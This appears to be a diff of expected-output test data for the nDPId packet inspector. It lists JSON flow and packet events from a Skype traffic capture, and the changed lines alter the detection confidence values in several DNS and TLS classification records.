00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431970634730,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634730,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIWAAAEAR1c7AqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} -00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431970634731,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634731,"pkt":"0NQSxnP1PBXCt3IOCABFAABL+hcAAEAR\/RbAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} -00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} -01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431970635325,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970635325,"pkt":"0NQSxnP1PBXCt3IOCABFAAA657QAAEARD4vAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4MoAAEARFm\/AqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431970635375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635375,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWkkAAEARnPDAqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1431970635433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970635433,"pkt":"0NQSxnP1PBXCt3IOCABFAABECpEAAEAR7KTAqAEiwKgBAfitADUAMI+fhgYBAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431970635489,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970635489,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+K0AQBV0hgaBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAMABBfOIaY="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431970635489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970635489,"pkt":"0NQSxnP1PBXCt3IOCABFAABAPS1AAEAGAk3AqAEiF84hpsgfAbv4Tz2XAAAAALAC\/\/9zuAAAAgQFtAEDAwUBAQgKPjGKEwAAAAAEAgAA"} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDdt0AAEARgFnAqAEiwKgBAeUHADUAL+4jvNsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431970635531,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431970635531,"pkt":"0NQSxnP1PBXCt3IOCABFAABDiigAAEARbQ7AqAEiwKgBAe0QADUAL\/kqxMsBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431970635534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970635534,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yB8YNTxd+E89mKASOJCdjgAAAgQFrAQCCArsPW3FPjGKEwEDAwU="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431970635534,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970635534,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0P2xAAEAGABrAqAEiF84hpsgfAbv4Tz2YGDU8XoAQECz0iAAAAQEICj4xij\/sPW3F"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970635489,"flow_last_seen":1431970635535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970635535,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA762oAAEARC9TAqAEiwKgBAfrwADUAJ8Zq760BAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431970635681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970635681,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7\/zoAAEAR+APAqAEiwKgBAcLIADUAJ6plKNsBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} 